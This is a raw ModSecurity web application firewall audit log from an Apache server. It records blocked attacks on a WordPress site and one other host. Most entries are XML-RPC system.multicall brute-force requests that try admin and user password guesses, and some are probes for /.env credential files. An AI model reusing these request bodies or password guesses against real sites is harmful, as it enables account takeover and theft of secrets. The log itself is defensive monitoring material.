Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --29dca246-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdmin1234 --29dca246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29dca246-E-- --29dca246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 152.53.50.108 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103311580674 4583 (- - -) Stopwatch2: 1749103311580674 4583; combined=3473, p1=382, p2=2930, p3=0, p4=0, p5=94, sr=71, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29dca246-Z-- --acf48d5b-A-- [05/Jun/2025:13:04:17 +0700] aEEzYSrHpfaS2Cuwh8XUYgAAAEY 103.236.140.4 37028 103.236.140.4 8181 --acf48d5b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --acf48d5b-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminF*uckYou --acf48d5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf48d5b-E-- --acf48d5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103457523349 5906 (- - -) Stopwatch2: 1749103457523349 5906; combined=4234, p1=504, p2=3553, p3=0, p4=0, p5=104, sr=103, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf48d5b-Z-- --024fcc3d-A-- [05/Jun/2025:13:06:07 +0700] aEEzz-th7G2xELALzPYjAwAAAME 103.236.140.4 37084 103.236.140.4 8181 --024fcc3d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --024fcc3d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix@1234 --024fcc3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --024fcc3d-E-- --024fcc3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103567775788 5762 (- - -) Stopwatch2: 1749103567775788 5762; combined=4065, p1=518, p2=3371, p3=0, p4=0, p5=104, sr=90, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --024fcc3d-Z-- --513a180c-A-- [05/Jun/2025:13:06:30 +0700] aEEz5irHpfaS2Cuwh8XUZgAAAEk 103.236.140.4 37114 103.236.140.4 8181 --513a180c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --513a180c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin*2020 --513a180c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --513a180c-E-- --513a180c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103590332113 35746 (- - -) Stopwatch2: 1749103590332113 35746; combined=64332, p1=492, p2=3398, p3=0, p4=0, p5=30238, sr=89, sw=71, l=0, gc=30133 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --513a180c-Z-- --02e95f23-A-- [05/Jun/2025:13:08:36 +0700] aEE0ZFwdJdhOudw5hdzPawAAAIY 103.236.140.4 37176 103.236.140.4 8181 --02e95f23-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --02e95f23-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin01! --02e95f23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02e95f23-E-- --02e95f23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103716926580 5045 (- - -) Stopwatch2: 1749103716926580 5045; combined=3818, p1=377, p2=3177, p3=0, p4=0, p5=153, sr=82, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02e95f23-Z-- --e153b10b-A-- [05/Jun/2025:13:09:33 +0700] aEE0neth7G2xELALzPYjFwAAAMM 103.236.140.4 37206 103.236.140.4 8181 --e153b10b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e153b10b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh01! --e153b10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e153b10b-E-- --e153b10b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103773733761 5668 (- - -) Stopwatch2: 1749103773733761 5668; combined=4011, p1=528, p2=3318, p3=0, p4=0, p5=98, sr=96, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e153b10b-Z-- --cce16f04-A-- [05/Jun/2025:13:09:42 +0700] aEE0puth7G2xELALzPYjGgAAAMU 103.236.140.4 37212 103.236.140.4 8181 --cce16f04-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 66.29.147.231 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 66.29.147.231 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cce16f04-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminTest@123 --cce16f04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cce16f04-E-- --cce16f04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 66.29.147.231 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103782150452 5355 (- - -) Stopwatch2: 1749103782150452 5355; combined=3847, p1=442, p2=3226, p3=0, p4=0, p5=106, sr=86, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cce16f04-Z-- --e1f02d12-A-- [05/Jun/2025:13:10:38 +0700] aEE03n-K7ToMdu-YSIIkowAAAAQ 103.236.140.4 37236 103.236.140.4 8181 --e1f02d12-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e1f02d12-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1982 --e1f02d12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f02d12-E-- --e1f02d12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103838457110 5161 (- - -) Stopwatch2: 1749103838457110 5161; combined=3794, p1=465, p2=3160, p3=0, p4=0, p5=99, sr=89, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1f02d12-Z-- --54bd854f-A-- [05/Jun/2025:13:10:47 +0700] aEE05-th7G2xELALzPYjIQAAAM0 103.236.140.4 37242 103.236.140.4 8181 --54bd854f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --54bd854f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2011 --54bd854f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54bd854f-E-- --54bd854f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103847944962 5246 (- - -) Stopwatch2: 1749103847944962 5246; combined=3854, p1=489, p2=3196, p3=0, p4=0, p5=99, sr=90, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54bd854f-Z-- --45c0b655-A-- [05/Jun/2025:13:11:05 +0700] aEE0-eth7G2xELALzPYjJAAAANA 103.236.140.4 37252 103.236.140.4 8181 --45c0b655-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400 Accept-Charset: utf-8 --45c0b655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45c0b655-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749103865382110 667 (- - -) Stopwatch2: 1749103865382110 667; combined=284, p1=250, p2=0, p3=0, p4=0, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45c0b655-Z-- --e3124626-A-- [05/Jun/2025:13:11:44 +0700] aEE1IH-K7ToMdu-YSIIkpgAAAAo 103.236.140.4 37268 103.236.140.4 8181 --e3124626-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.68.62.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.68.62.175 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e3124626-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh05 --e3124626-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3124626-E-- --e3124626-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.68.62.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103904271110 5710 (- - -) Stopwatch2: 1749103904271110 5710; combined=4021, p1=519, p2=3334, p3=0, p4=0, p5=99, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3124626-Z-- --b89e8d2f-A-- [05/Jun/2025:13:12:08 +0700] aEE1OFwdJdhOudw5hdzPbwAAAIo 103.236.140.4 37272 103.236.140.4 8181 --b89e8d2f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b89e8d2f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix01 --b89e8d2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b89e8d2f-E-- --b89e8d2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103928801557 6153 (- - -) Stopwatch2: 1749103928801557 6153; combined=4376, p1=527, p2=3611, p3=0, p4=0, p5=135, sr=100, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b89e8d2f-Z-- --583d2d65-A-- [05/Jun/2025:13:16:06 +0700] aEE2JlwdJdhOudw5hdzPeAAAAJM 103.236.140.4 37374 103.236.140.4 8181 --583d2d65-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --583d2d65-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@777 --583d2d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --583d2d65-E-- --583d2d65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (2+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104166335245 5108 (- - -) Stopwatch2: 1749104166335245 5108; combined=3649, p1=431, p2=3068, p3=0, p4=0, p5=88, sr=76, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --583d2d65-Z-- --6ae7d77c-A-- [05/Jun/2025:13:16:07 +0700] aEE2J-th7G2xELALzPYjMQAAAMU 103.236.140.4 37376 103.236.140.4 8181 --6ae7d77c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6ae7d77c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh0000 --6ae7d77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ae7d77c-E-- --6ae7d77c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104167635458 6341 (- - -) Stopwatch2: 1749104167635458 6341; combined=4396, p1=528, p2=3688, p3=0, p4=0, p5=109, sr=101, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ae7d77c-Z-- --400e0321-A-- [05/Jun/2025:13:16:33 +0700] aEE2QSrHpfaS2Cuwh8XUkwAAAFE 103.236.140.4 37392 103.236.140.4 8181 --400e0321-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --400e0321-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin87 --400e0321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --400e0321-E-- --400e0321-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104193311055 5344 (- - -) Stopwatch2: 1749104193311055 5344; combined=3916, p1=494, p2=3255, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --400e0321-Z-- --9cb8047e-A-- [05/Jun/2025:13:16:54 +0700] aEE2VirHpfaS2Cuwh8XUlAAAAFA 103.236.140.4 37396 103.236.140.4 8181 --9cb8047e-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Accept-Charset: utf-8 Cookie: X-Forwarded-For: 91.206.169.53 Accept-Encoding: gzip X-Varnish: 172603810 --9cb8047e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9cb8047e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749104214268703 765 (- - -) Stopwatch2: 1749104214268703 765; combined=292, p1=257, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb8047e-Z-- --ed414654-A-- [05/Jun/2025:13:17:18 +0700] aEE2buth7G2xELALzPYjNQAAAMk 103.236.140.4 37400 103.236.140.4 8181 --ed414654-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ed414654-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin3 --ed414654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed414654-E-- --ed414654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
